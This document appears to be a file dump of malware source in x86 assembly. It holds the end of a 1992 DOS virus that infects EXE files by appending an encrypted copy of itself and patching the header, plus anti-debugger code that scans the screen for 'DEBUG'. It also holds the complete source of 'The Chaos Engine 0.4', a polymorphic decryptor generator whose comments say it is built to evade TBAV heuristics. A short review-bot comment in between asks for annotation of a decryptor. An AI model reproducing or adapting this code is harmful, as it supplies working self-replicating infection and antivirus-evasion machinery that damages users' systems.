||||
mov OldSP,ax
|
||||
mov al,2
|
||||
call Seek
|
||||
jc Error1
|
||||
push ax
|
||||
push dx
|
||||
mov cx,200h
|
||||
div cx
|
||||
cmp PartPage,dx
|
||||
jne SizeError
|
||||
add dx,-1
|
||||
adc ax,0
|
||||
cmp PageCount,ax
|
||||
SizeError: pop dx
|
||||
pop ax
|
||||
jne Error2
|
||||
add ax,0fh
|
||||
adc dx,0
|
||||
and ax,0fff0h
|
||||
mov cx,dx
|
||||
mov dx,ax
|
||||
mov ax,4200h
|
||||
call Dos
|
||||
jnc SeekOk
|
||||
Error2: jmp Old21
|
||||
SeekOk: mov cx,10h
|
||||
div cx
|
||||
sub ax,HdrSize
|
||||
mov ExeCS,ax
|
||||
mov ExeIP,offset Decrypt1
|
||||
mov ExeSS,ax
|
||||
mov ExeSP,VirusSize1+400h
|
||||
cmp MinMem,40h
|
||||
jae MemoryOk
|
||||
mov MinMem,40h
|
||||
cmp MaxMem,40h
|
||||
jae MemoryOk
|
||||
mov MaxMem,40h
|
||||
MemoryOk: push ds
|
||||
push es
|
||||
mov ax,cs
|
||||
mov ds,ax
|
||||
add ax,(VirusSize2+0fh)/10h
|
||||
mov es,ax
|
||||
mov cx,VirusSize1
|
||||
xor si,si
|
||||
xor di,di
|
||||
cld
|
||||
rep movsb
|
||||
mov ds,ax
|
||||
mov cx,offset StartEncrypt-Decrypt2
|
||||
mov dl,byte ptr ds:Decrypt1[6]
|
||||
mov si,offset StartEncrypt-1
|
||||
Again1: xor ds:[si],dl
|
||||
dec si
|
||||
loop Again1
|
||||
mov cx,(VirusEnd1-StartEncrypt+1)/2
|
||||
mov dh,dl
|
||||
mov si,offset StartEncrypt
|
||||
Again2: xor ds:[si],dx
|
||||
mov ax,ds:[si]
|
||||
add dx,ax
|
||||
inc si
|
||||
add dx,ax
|
||||
inc si
|
||||
loop Again2
|
||||
mov ah,40h
|
||||
mov cx,VirusSize1
|
||||
xor dx,dx
|
||||
call Dos
|
||||
pop ds
|
||||
pop es
|
||||
jc Error3
|
||||
mov al,2
|
||||
call Seek
|
||||
jc Error3
|
||||
mov cx,200h
|
||||
div cx
|
||||
mov PartPage,dx
|
||||
add dx,-1
|
||||
adc ax,0
|
||||
mov PageCount,ax
|
||||
mov ChkSum,0DEADh
|
||||
xor al,al
|
||||
call Seek
|
||||
jc Error3
|
||||
mov ah,40h
|
||||
mov cx,18h
|
||||
mov dx,offset Signature
|
||||
call Dos
|
||||
Error3: jmp Old21
|
||||
|
||||
Count dw 8
|
||||
DebugStr db 'DEBUG'
|
||||
CommandStr db 'COMMAND '
|
||||
|
||||
DebugWatch: push ax
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
dec cs:Count
|
||||
jnz EndWatch
|
||||
mov cs:Count,8
|
||||
mov ax,0b000h
|
||||
mov ds,ax
|
||||
mov cx,2
|
||||
push cs
|
||||
pop es
|
||||
cld
|
||||
NextScreen: push cx
|
||||
mov cx,2000
|
||||
xor si,si
|
||||
mov di,offset DebugStr
|
||||
NextChar1: mov dx,5
|
||||
NextChar2: lodsb
|
||||
inc si
|
||||
and al,0dfh
|
||||
scasb
|
||||
jne CharOk
|
||||
dec dx
|
||||
jnz NextChar2
|
||||
Alarm: pop cx
|
||||
lds si,cs:HackAddress
|
||||
cmp byte ptr ds:[si],0cdh
|
||||
jne EndWatch
|
||||
mov ax,cs:SavedCode
|
||||
mov ds:[si],ax
|
||||
xor cx,cx
|
||||
mov ds,cx
|
||||
mov ax,cs:OldInt8o
|
||||
mov ds:[20h],ax
|
||||
mov ax,cs:OldInt8s
|
||||
mov ds:[22h],ax
|
||||
mov es,cx
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,14
|
||||
mov si,offset EndWatch-2
|
||||
mov di,4f0h
|
||||
push es
|
||||
push di
|
||||
rep movsb
|
||||
xor di,di
|
||||
mov cx,VirusSize2
|
||||
push cs
|
||||
pop es
|
||||
retf
|
||||
CharOk: neg dx
|
||||
add dx,5
|
||||
sbb di,dx
|
||||
sub si,dx
|
||||
sub si,dx
|
||||
loop NextChar1
|
||||
ScreenOk: mov ax,ds
|
||||
add ax,800h
|
||||
mov ds,ax
|
||||
pop cx
|
||||
loop NextScreen
|
||||
jmp short EndWatch
|
||||
rep stosb
|
||||
EndWatch: pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
db 0eah
|
||||
OldInt8o dw ?
|
||||
OldInt8s dw ?
|
||||
|
||||
db '***** (C) COPYRIGHT 1992 BY THE WRITER *****'
|
||||
|
||||
VirusEnd1 equ $
|
||||
|
||||
FirstMCB dw ?
|
||||
RegAX dw ?
|
||||
RegSP dw ?
|
||||
|
||||
Handle dw ?
|
||||
Signature dw ?
|
||||
PartPage dw ?
|
||||
PageCount dw ?
|
||||
ReloCnt dw ?
|
||||
HdrSize dw ?
|
||||
MinMem dw ?
|
||||
MaxMem dw ?
|
||||
ExeSS dw ?
|
||||
ExeSP dw ?
|
||||
ChkSum dw ?
|
||||
ExeIP dw ?
|
||||
ExeCS dw ?
|
||||
|
||||
VirusEnd2 equ $
|
||||
|
||||
virus ends
|
||||
|
||||
end Main
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
|
||||
|
|
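Review bot: The hand-assembled bytes at L10649-L10655 (`Decrypt1: db 0bdh,...`, `db 80h,76h,...`, `db 4dh,75h,-7`) carry no mnemonic comment, while the same file annotates its other inline opcodes (`db 0b8h ; mov ax,????` at L11347, `Opcode db 0ebh,3,0 ; j?? +3` at L11356); for consistency each `db` line here should state the instruction it encodes. The `ret 2` / `ret -8` / `ret -4` forms at L10664, L10686 and L10703 together with the address table at L10708-L10717 are equally uncommented, so a short block comment above `Decrypt1` describing how SP is positioned on that table (`mov sp,offset DoAgain-2` at L10661) and in what order the labels run would let an analyst follow the decryptor without single-stepping it. The TBSCAN.DAT string in the header (L10616) is the only analysis aid the section currently provides.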
@ -0,0 +1,862 @@
radix 16
|
||||
|
||||
;*****************************************
|
||||
;* T.H.E - C.H.A.O.S - E.N.G.I.N.E - 0.4 *
|
||||
;*****************************************
|
||||
;1995 - Sepultura - Australia
|
||||
;;
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;on CALLing of TCE -
|
||||
;;;AX = TCE Flags:1 - Pad To DECRYPTOR_LENGTH.
|
||||
;;; 2 - Make Short Decryptor (No Junk).
|
||||
;;; 4 - Add Segment Overide.
|
||||
;;;
|
||||
;;;CX = Length of Code to Encrypt.
|
||||
;;;DX = Delta Offset.
|
||||
;;;DS:SI = Code to encrypt (DS _MUST_ = CS).
|
||||
;;;ES:DI = Location of Buffer to Create Decryptor in.
|
||||
;;;
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;ON RETURN:
|
||||
;;;ES = DS = Segment of Decryptor / Encrypted Code
|
||||
;;;DX = Pointer to Start of Code
|
||||
;;;CX = Length of Code
|
||||
;;;;;;;;;;;;;;;;;;;
|
||||
;;;Flag EQUates
|
||||
|
||||
MAKE_SMALL equ 1
|
||||
PAD_TO_MAX equ 2
|
||||
ADD_SEG equ 4
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;
|
||||
;;;W.H.A.T.E.V.E.R
|
||||
|
||||
DECRYPTOR_LENGTH equ 190h
|
||||
MAX_PADDING equ 90h - 1f
|
||||
length_1 equ (offset int_tbl - offset one_byters)-1
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;REGISTER TABLE - INTEL STANDLE FORMAT
|
||||
|
||||
tce_AX equ 0000xB
|
||||
tce_CX equ 0001xB
|
||||
tce_DX equ 0010xB
|
||||
tce_BX equ 0011xB
|
||||
tce_SP equ 0100xB
|
||||
tce_BP equ 0101xB
|
||||
tce_SI equ 0110xB
|
||||
tce_DI equ 0111xB
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
;;;THe BeLoW InSTuCTiOn CaN KilL A MaN
|
||||
|
||||
db '[TCE-0.4]',0
|
||||
|
||||
;*****************************************************
|
||||
;*****************************************************
|
||||
;*** The REAL _REAL_ START of THE CHAOS ENGINE 0.4 ***
|
||||
;*****************************************************
|
||||
;*****************************************************
|
||||
|
||||
tce: push ax,bx,bp
|
||||
push di,si
|
||||
|
||||
cld
|
||||
|
||||
mov tce_begin,di
|
||||
mov tce_delta,dx
|
||||
mov c_length,cx
|
||||
mov tce_flags,ax
|
||||
call clear_regs
|
||||
mov B index_sub,0
|
||||
|
||||
mov B[offset more_junk],0b0
|
||||
test W tce_flags,MAKE_SMALL
|
||||
if nz mov B[offset more_junk],0c3
|
||||
|
||||
push si
|
||||
call get_rand_1f
|
||||
add ax,MAX_PADDING
|
||||
xchg cx,ax
|
||||
call more_junk
|
||||
|
||||
swap0: mov si,offset init_1
|
||||
lodsw
|
||||
call binary
|
||||
jz no_swap1
|
||||
xchg ax,[si]
|
||||
mov [si-2],ax
|
||||
|
||||
no_swap1:
|
||||
push ax
|
||||
lodsw
|
||||
call binary
|
||||
jnz no_swap2
|
||||
xchg ax,[si]
|
||||
mov [si-2],ax
|
||||
|
||||
no_swap2:
|
||||
push ax
|
||||
lodsw
|
||||
lodsw
|
||||
call binary
|
||||
jz build_code
|
||||
xchg ax,[si]
|
||||
mov [si-2],ax
|
||||
|
||||
build_code:
|
||||
pop ax
|
||||
call ax
|
||||
call pad_10
|
||||
pop ax
|
||||
call ax
|
||||
call pad_10
|
||||
call W init_3
|
||||
call pad_10
|
||||
call gen_decrypt
|
||||
call pad_8
|
||||
call W init_4
|
||||
call pad_8
|
||||
call W init_5
|
||||
call pad_10
|
||||
call gen_loop
|
||||
call pad_8
|
||||
|
||||
test W tce_flags,PAD_TO_MAX
|
||||
jz no_padding
|
||||
|
||||
mov B[offset more_junk],0b0
|
||||
mov cx,DECRYPTOR_LENGTH
|
||||
add cx,tce_begin
|
||||
sub cx,di
|
||||
call more_junk
|
||||
|
||||
no_padding:
|
||||
mov ax,di
|
||||
sub ax,DECRYPTOR_LENGTH
|
||||
add enc_index,ax
|
||||
mov bx,W index_loc
|
||||
cmp B index_sub,1
|
||||
if e neg ax
|
||||
add es:[bx],ax
|
||||
|
||||
pop si
|
||||
mov cx,c_length
|
||||
rep movsb
|
||||
mov dx,tce_begin
|
||||
mov ds,es
|
||||
call encryptor
|
||||
mov cx,di
|
||||
sub cx,dx
|
||||
|
||||
pop si,di
|
||||
pop bp,bx,ax
|
||||
ret
|
||||
|
||||
init_count: ;Initialises Count Register..
|
||||
call get_unused_reg ;Make Count Initialiser in Encryptor and
|
||||
cmp al,tce_DX
|
||||
je init_count
|
||||
mov count_reg,al ;Decryptor
|
||||
mov bx,W c_length
|
||||
shr bx,1
|
||||
mov W enc_length,bx
|
||||
call gen_mov_reg
|
||||
ret
|
||||
|
||||
init_index: ;Initialises Index Register..
|
||||
mov ax,0ff ;Makes Index Initialiser in Encryptor and
|
||||
call get_rand ;Decryptor..
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
if z xor ax,ax
|
||||
mov B index_off,al
|
||||
mov bx,DECRYPTOR_LENGTH
|
||||
add bx, tce_begin
|
||||
mov W enc_index,bx
|
||||
add bx, tce_delta
|
||||
cbw
|
||||
sub bx,ax
|
||||
|
||||
get_index:
|
||||
call get_unused_reg
|
||||
cmp al,tce_BX
|
||||
jb get_index
|
||||
mov W index_num,ax
|
||||
mov B index_reg,al
|
||||
mov B index_set,1
|
||||
call gen_mov_reg
|
||||
mov B index_set,0
|
||||
ret
|
||||
|
||||
gen_decrypt: ;generates DECRYPTOR / ENCRYPTOR instruction
|
||||
mov W loop_start,di
|
||||
call pad_8
|
||||
mov bl,B key_reg
|
||||
sal bl,3
|
||||
call get_rand_2
|
||||
add ax,ax
|
||||
add ax,offset enc_table
|
||||
xchg si,ax
|
||||
lodsw
|
||||
call binary
|
||||
if z xchg ah,al
|
||||
push ax
|
||||
cmp si,offset enc_table + 2
|
||||
jne no_carry_set
|
||||
mov al,0f8
|
||||
call binary
|
||||
if z inc ax
|
||||
mov B enc_cf,al
|
||||
stosb
|
||||
|
||||
no_carry_set:
|
||||
test W tce_flags,ADD_SEG
|
||||
jz no_seg_set
|
||||
mov al,2e
|
||||
stosb
|
||||
|
||||
no_seg_set:
|
||||
pop ax
|
||||
stosb
|
||||
mov B enc_loop,ah
|
||||
mov si,W index_num
|
||||
|
||||
cmp B index_reg,tce_BP
|
||||
je encryptor_has_offset
|
||||
cmp B index_off,0
|
||||
jne encryptor_has_offset
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
jz encryptor_has_offset
|
||||
add si,index_tab_c
|
||||
lodsb
|
||||
or al,bl
|
||||
stosb
|
||||
ret
|
||||
|
||||
encryptor_has_offset:
|
||||
add si,index_tab_b
|
||||
lodsb
|
||||
or al,bl
|
||||
mov ah,B index_off
|
||||
or al,bl
|
||||
stosw
|
||||
xchg al,ah
|
||||
cbw
|
||||
call binary
|
||||
jnz ret
|
||||
mov al,ah
|
||||
stosb
|
||||
add es:B[di-3],40
|
||||
ret
|
||||
|
||||
modify_key: ;Modify Key: XOR/ADD/SUB key_reg,xxxx
|
||||
call get_rand_7
|
||||
jz no_mod_key
|
||||
call get_rand_2
|
||||
add ax,offset modify_table
|
||||
xchg si,ax
|
||||
lodsb
|
||||
mov ah,al
|
||||
mov al,81
|
||||
mov W enc_mod_op,ax
|
||||
or ah,B key_reg
|
||||
stosw
|
||||
call get_any_rand
|
||||
stosw
|
||||
|
||||
no_mod_key:
|
||||
mov W enc_mod_val,ax
|
||||
|
||||
ret
|
||||
|
||||
inc_index: ;increase index by 2..
|
||||
call binary ;1 in 2 chance of ADD reg,2/SUB reg,-2
|
||||
jz add_sub_index
|
||||
|
||||
mov al,B index_reg
|
||||
or al,40
|
||||
stosb
|
||||
call pad_8
|
||||
stosb
|
||||
ret
|
||||
|
||||
add_sub_index:
|
||||
mov al,83
|
||||
stosb
|
||||
mov ah,2
|
||||
mov al,B index_reg
|
||||
or al,0c0
|
||||
|
||||
call binary
|
||||
jnz put_add_sub_index
|
||||
|
||||
neg ah
|
||||
or al,0e8
|
||||
|
||||
put_add_sub_index:
|
||||
stosw
|
||||
ret
|
||||
|
||||
gen_loop:
|
||||
mov al,B count_reg
|
||||
cmp al,tce_CX
|
||||
jne not_CX
|
||||
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
jz not_CX
|
||||
|
||||
lea bx,[di+2]
|
||||
mov ax,W loop_start
|
||||
sub ax,bx
|
||||
mov ah,0e2
|
||||
call binary
|
||||
jnz no_loop_nz
|
||||
xchg bp,ax
|
||||
jmp short do_loop_nz
|
||||
|
||||
no_loop_nz:
|
||||
xchg ah,al
|
||||
stosw
|
||||
ret
|
||||
|
||||
not_CX: xchg bx,ax
|
||||
|
||||
call binary
|
||||
jz count_add_sub
|
||||
|
||||
mov al,48
|
||||
or al,bl
|
||||
stosb
|
||||
jmp short zero_test
|
||||
|
||||
|
||||
count_add_sub:
|
||||
mov al,83
|
||||
stosb
|
||||
mov ah,-1
|
||||
mov al,bl
|
||||
or al,0c0
|
||||
|
||||
call binary
|
||||
jnz put_add_sub_count
|
||||
|
||||
neg ah
|
||||
or al,0e8
|
||||
|
||||
put_add_sub_count:
|
||||
stosw
|
||||
xor bp,bp
|
||||
push ax
|
||||
call get_rand_7
|
||||
pop ax
|
||||
jz nloop_nz
|
||||
|
||||
zero_test:
|
||||
call pad_10
|
||||
xor bp,bp
|
||||
do_loop_nz:
|
||||
mov al,B count_reg
|
||||
mov bl,al
|
||||
sal al,3
|
||||
or al,bl
|
||||
xchg ah,al
|
||||
mov bh,ah
|
||||
call get_rand_2
|
||||
add ax,offset zero_test_a
|
||||
xchg si,ax
|
||||
lodsb
|
||||
mov ah,bh
|
||||
or ah,0c0
|
||||
stosw
|
||||
|
||||
nloop_nz:
|
||||
lea bx,[di+2]
|
||||
mov ax,W loop_start
|
||||
sub ax,bx
|
||||
or bp,bp
|
||||
jnz loop_nz
|
||||
mov ah,075
|
||||
call binary
|
||||
jnz nnnn
|
||||
mov B es:[di],0f8
|
||||
inc di
|
||||
sub ax,0fe01
|
||||
db 0a9
|
||||
|
||||
loop_nz:mov ah,0e0
|
||||
|
||||
|
||||
nnnn: xchg ah,al
|
||||
stosw
|
||||
ret
|
||||
|
||||
init_key:
|
||||
call get_any_rand
|
||||
mov W enc_key,ax
|
||||
xchg bx,ax
|
||||
call get_unused_reg
|
||||
mov B key_reg,al
|
||||
|
||||
gen_mov_reg:
|
||||
call binary
|
||||
jz lea_mov
|
||||
|
||||
or al,0b8
|
||||
stosb
|
||||
xchg ax,bx
|
||||
jmp short put_mov_b
|
||||
|
||||
lea_mov:call binary
|
||||
jz zero_then_add
|
||||
|
||||
sal al,3
|
||||
or al,06
|
||||
mov ah,8d
|
||||
xchg ah,al
|
||||
stosw
|
||||
xchg ax,bx
|
||||
jmp short put_mov_b
|
||||
|
||||
zero_then_add: ;Zero Register (XOR/SUB reg,reg)
|
||||
push bx ;Then OR/XOR/ADD Value
|
||||
push ax ;or SUB -Value
|
||||
mov ah,0c0
|
||||
or ah,al
|
||||
sal al,3
|
||||
or ah,al
|
||||
mov al,29
|
||||
call binary
|
||||
if z mov al,31
|
||||
stosw
|
||||
call pad_10
|
||||
pop bx
|
||||
call get_rand_2
|
||||
add ax,offset value_from_0
|
||||
xchg si,ax
|
||||
lodsb
|
||||
call binary
|
||||
jz zero_then_sub
|
||||
|
||||
or al,bl
|
||||
mov ah,81
|
||||
xchg ah,al
|
||||
stosw
|
||||
pop ax
|
||||
|
||||
put_mov_b:
|
||||
cmp B index_set,01
|
||||
if e mov W index_loc,di
|
||||
stosw
|
||||
ret
|
||||
|
||||
zero_then_sub:
|
||||
cmp B index_set,01
|
||||
if e mov B index_sub,1
|
||||
mov al,0e8
|
||||
or al,bl
|
||||
mov ah,81
|
||||
xchg ah,al
|
||||
stosw
|
||||
pop ax
|
||||
neg ax
|
||||
jmp short put_mov_b
|
||||
|
||||
pad_8: push ax ;Sub Procedure to Pad Between 1 and 8 bytes
|
||||
call get_rand_7
|
||||
inc ax
|
||||
jmp short padder
|
||||
|
||||
pad_10: push ax
|
||||
call get_rand_1f ;Sub Procedure to Pad Between 8 and 16 bytes
|
||||
or al,8
|
||||
padder: xchg cx,ax
|
||||
call more_junk
|
||||
pop ax
|
||||
ret
|
||||
|
||||
|
||||
more_junk:
|
||||
mov al,03
|
||||
call get_rand_b
|
||||
jnz mj0
|
||||
|
||||
mov B [offset code_jmp],083 ;Re-Enable Jumps
|
||||
mov ax,cx ;else normal filler junk (1 in 16)
|
||||
cmp ax,40
|
||||
if a mov al,40
|
||||
call get_rand_b
|
||||
xchg bx,ax
|
||||
call fill_jnk
|
||||
jmp short mj2
|
||||
|
||||
mj0: ;8 in 16 chance of some type of jump
|
||||
call code_jmp
|
||||
|
||||
|
||||
mj2: jcxz ret
|
||||
jmp short more_junk
|
||||
|
||||
|
||||
one_byte: ;GENERATES A ONE BYTE JUNK INSTRUCTION
|
||||
jcxz ret
|
||||
mov si,one_byters ;FROM one_byters TABLE
|
||||
mov al,length_1
|
||||
call get_rand_b
|
||||
add si,ax
|
||||
movsb
|
||||
dec cx
|
||||
dec bx
|
||||
ret
|
||||
|
||||
reg_op: call get_rand_7 ;ANY OP unused_reg16,reg16..
|
||||
sal al,3
|
||||
or al,3
|
||||
xchg dx,ax
|
||||
call get_unused_reg
|
||||
sal al,3
|
||||
mov dh,al
|
||||
call get_rand_7
|
||||
do_op: or dh,al
|
||||
or dh,0c0
|
||||
xchg dx,ax
|
||||
put_2: cmp bx,2
|
||||
jb one_byte
|
||||
stosw
|
||||
dec cx,2
|
||||
dec bx,2
|
||||
ret
|
||||
|
||||
|
||||
lea_reg:call get_rand_7 ;LEA unused_reg,[BP/BX/SI/DI]
|
||||
cmp al,6
|
||||
je lea_reg
|
||||
|
||||
xchg dx,ax
|
||||
call get_unused_reg
|
||||
sal al,3
|
||||
or al,dl
|
||||
mov ah,08d
|
||||
xchg ah,al
|
||||
|
||||
jmp short put_2
|
||||
|
||||
op_ax: call get_any_rand
|
||||
and al,8
|
||||
or al,5
|
||||
and ah,3
|
||||
shr ah,4
|
||||
or al,ah
|
||||
|
||||
put_3: cmp bx,3
|
||||
jb reg_op
|
||||
stosb
|
||||
call get_any_rand
|
||||
put_3b: stosw
|
||||
sub cx,3
|
||||
sub bx,3
|
||||
ret
|
||||
|
||||
mov_reg:call get_unused_reg ;MOV unused_reg16,xxxx
|
||||
or al,0b8
|
||||
jmp short put_3
|
||||
|
||||
|
||||
op_reg_im: ;cmp/add/sub/adc/sbb/or/xor/and reg16,imm16
|
||||
cmp bx,4
|
||||
jb op_ax
|
||||
call get_unused_reg
|
||||
mov ah,81
|
||||
xchg dx,ax
|
||||
call get_rand_7
|
||||
sal al,3
|
||||
or ax,dx
|
||||
xchg ah,al
|
||||
or ah,0c0
|
||||
stosw
|
||||
call get_any_rand
|
||||
stosw
|
||||
sub bx,4
|
||||
sub cx,4
|
||||
ret
|
||||
|
||||
|
||||
code_jmp:
|
||||
cmp cx,3
|
||||
jb ret
|
||||
|
||||
mov B [offset code_jmp],0c3 ;Disable Jumps.This ensures Unchained
|
||||
;(TBAV-J) and helps stops heuristics
|
||||
call get_any_rand ;else conditional jmp
|
||||
and ax,1f0f ;between 4 and 43 bytse jmp length
|
||||
add ah,4
|
||||
or al,70 ;conditional jmp instructions are 70
|
||||
;--> 7f
|
||||
push ax
|
||||
call get_rand_1f
|
||||
pop ax
|
||||
if z mov al,0e3
|
||||
xor bx,bx
|
||||
mov bl,ah
|
||||
|
||||
dec cx,2
|
||||
cmp bx,cx
|
||||
jb put_jmp
|
||||
mov bx,cx
|
||||
mov ah,bl
|
||||
|
||||
put_jmp:stosw
|
||||
|
||||
fill_jnk:
|
||||
or bx,bx
|
||||
jz ret
|
||||
|
||||
mov al,((offset binary - offset junk_tbl)/2)-1
|
||||
call get_rand_b
|
||||
add ax,ax
|
||||
add ax,offset junk_tbl
|
||||
xchg si,ax
|
||||
lodsw
|
||||
call ax
|
||||
jmp short fill_jnk
|
||||
|
||||
|
||||
pp_reg: ;generate PUSH reg / junk / POP reg
|
||||
cmp bx,3
|
||||
jb gen_int
|
||||
|
||||
lea ax,[bx-2]
|
||||
shr ax,1
|
||||
call get_rand
|
||||
xchg ax,dx
|
||||
call get_rand_7
|
||||
or al,50
|
||||
stosb
|
||||
dec cx
|
||||
dec bx
|
||||
push ax
|
||||
xchg dx,ax
|
||||
sub bx,ax
|
||||
push bx
|
||||
xchg bx,ax
|
||||
call fill_jnk
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
call binary
|
||||
jz use_same
|
||||
call get_unused_reg
|
||||
or al,50
|
||||
|
||||
use_same:
|
||||
or al,8
|
||||
stosb
|
||||
dec cx
|
||||
dec bx
|
||||
ret
|
||||
|
||||
|
||||
gen_int:cmp bx,4
|
||||
jb ret
|
||||
|
||||
call get_rand_2
|
||||
|
||||
add ax,ax
|
||||
add ax,offset int_tbl
|
||||
xchg si,ax
|
||||
lodsw
|
||||
mov dx,0cdb4
|
||||
xchg al,dl
|
||||
stosw
|
||||
xchg dx,ax
|
||||
xchg ah,al
|
||||
stosw
|
||||
sub cx,4
|
||||
sub bx,4
|
||||
ret
|
||||
|
||||
junk_tbl: dw offset op_reg_im
|
||||
dw offset op_reg_im
|
||||
dw offset op_reg_im
|
||||
dw offset gen_int
|
||||
dw offset gen_int
|
||||
dw offset pp_reg
|
||||
dw offset pp_reg
|
||||
dw offset reg_op
|
||||
dw offset reg_op
|
||||
dw offset lea_reg
|
||||
dw offset lea_reg
|
||||
dw offset mov_reg
|
||||
dw offset op_ax
|
||||
dw offset one_byte
|
||||
|
||||
binary: push ax
|
||||
mov al,1
|
||||
call get_rand_b
|
||||
pop ax
|
||||
ret
|
||||
|
||||
get_rand_2:
|
||||
mov al,2
|
||||
db 0a9
|
||||
|
||||
get_rand_7:
|
||||
mov al,7
|
||||
db 0a9
|
||||
|
||||
get_rand_1f:
|
||||
mov al,1f
|
||||
db 0a9
|
||||
|
||||
get_any_rand: ;return rnd number in AX between 0 and FFFE
|
||||
mov al,0fe
|
||||
|
||||
get_rand_b:
|
||||
cbw
|
||||
|
||||
get_rand: ;returns random number in AX between 0 and AX
|
||||
push cx,dx
|
||||
inc ax
|
||||
push ax
|
||||
in ax,40
|
||||
xchg cx,ax
|
||||
in ax,40
|
||||
rol ax,cl
|
||||
xchg cx,ax
|
||||
in ax,40
|
||||
xor ax,cx
|
||||
adc ax,1234
|
||||
org $-2
|
||||
last_rand dw 0AAAA
|
||||
mov last_rand,ax
|
||||
pop cx
|
||||
xor dx,dx
|
||||
cmp cx,1
|
||||
adc cx,0
|
||||
div cx
|
||||
xchg dx,ax
|
||||
or ax,ax
|
||||
pop dx,cx
|
||||
ret
|
||||
|
||||
one_byters: cmc ;15 1 byte junk instructions
|
||||
cld
|
||||
std
|
||||
in ax,dx
|
||||
in al,dx
|
||||
lahf
|
||||
cbw
|
||||
nop
|
||||
aaa
|
||||
aas
|
||||
daa
|
||||
das
|
||||
inc ax
|
||||
dec ax
|
||||
xlat
|
||||
|
||||
|
||||
int_tbl: dw 0116 ;AH=01,INT16: Check Keyboard Buffer..
|
||||
dw 0216 ;AH=02,INT16: Get Keyboard States..
|
||||
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
|
||||
dw 4d21 ;AH=4D,INT21: Get Program Terminate Status..
|
||||
dw 0d10 ;AH=0D,INT10: Get Video Info..
|
||||
dw 0b21 ;AH=0B,INT21: Check Keyboard Buffer..
|
||||
dw 002a
|
||||
dw 002a
|
||||
|
||||
|
||||
clear_regs: cwd
|
||||
mov B index_reg,dl ;Clears Register Tables
|
||||
mov B key_reg,dl ;(All Regs Free)..
|
||||
mov B count_reg,dl
|
||||
ret
|
||||
|
||||
get_unused_reg: call get_rand_7 ;Return an Unused Register..
|
||||
test al,NOT tce_SP ;But _NOT_ SP, or AX.
|
||||
jz get_unused_reg
|
||||
cmp al,index_reg
|
||||
je get_unused_reg
|
||||
cmp al,count_reg
|
||||
je get_unused_reg
|
||||
cmp al,B key_reg
|
||||
je get_unused_reg
|
||||
ret
|
||||
|
||||
|
||||
;**********************************************
|
||||
;* The Encryptor (Built along with Decryptor) *
|
||||
;**********************************************
|
||||
encryptor: mov cx,1234
|
||||
org $-2
|
||||
enc_length dw 0
|
||||
|
||||
mov bx,1234
|
||||
org $-2
|
||||
enc_index dw 0
|
||||
|
||||
mov ax,1234
|
||||
org $-2
|
||||
enc_key dw 0
|
||||
|
||||
enc_cf: nop
|
||||
enc_loop: xor [bx],ax
|
||||
|
||||
enc_mod_op dw 0
|
||||
enc_mod_val dw 0
|
||||
|
||||
inc bx,2
|
||||
loop enc_cf
|
||||
ret
|
||||
|
||||
;****************************
|
||||
;* Data / Variables / Flags *
|
||||
;****************************
|
||||
|
||||
init_1 dw offset init_count
|
||||
init_2 dw offset init_key
|
||||
init_3 dw offset init_index
|
||||
|
||||
init_4 dw offset inc_index
|
||||
init_5 dw offset modify_key
|
||||
|
||||
;* The Below is A table of Values to Be Used To Choose *
|
||||
;* The Count Register, The Index Register, and The Reg *
|
||||
;* to save SP in During the Decryptor Loop *
|
||||
; BX BP SI DI ;This Table is used To Build
|
||||
index_tab_b: db 0,0,0,47,0,46,44,45 ;The Decryptor Instruction
|
||||
index_tab_c: db 0,0,0,7,0,0,4,5 ;Same As Above
|
||||
; SBB ADC XOR XOR ADD SUB
|
||||
enc_table: db 19, 11, 31, 31, 01, 29 ;The Decryptor Opcodes..
|
||||
|
||||
; AND OR TEST
|
||||
zero_test_a: db 21, 09,85
|
||||
|
||||
; SUB ;Opcodes to Modify the Key
|
||||
modify_table: db 0e8 ;Register
|
||||
; ADD XOR OR ;Opcode to get A value
|
||||
value_from_0: db 0c0,0f0,0c8 ;from 0.
|
||||
|
||||
loop_start dw 0 ;Postion for LOOP to Jump to..
|
||||
|
||||
index_num dw 0
|
||||
index_off db 0 ;OFFSET of INDEX reference (i.e: [SI+XX]).
|
||||
index_loc dw 0 ;location in ES of index reference set
|
||||
index_sub db 0 ;Was index_reg set using 0 the sub -value?
|
||||
|
||||
index_reg db 0 ;Table of Used Registers..
|
||||
count_reg db 0 ;used in GET_UNUSED_REG
|
||||
key_reg db 0
|
||||
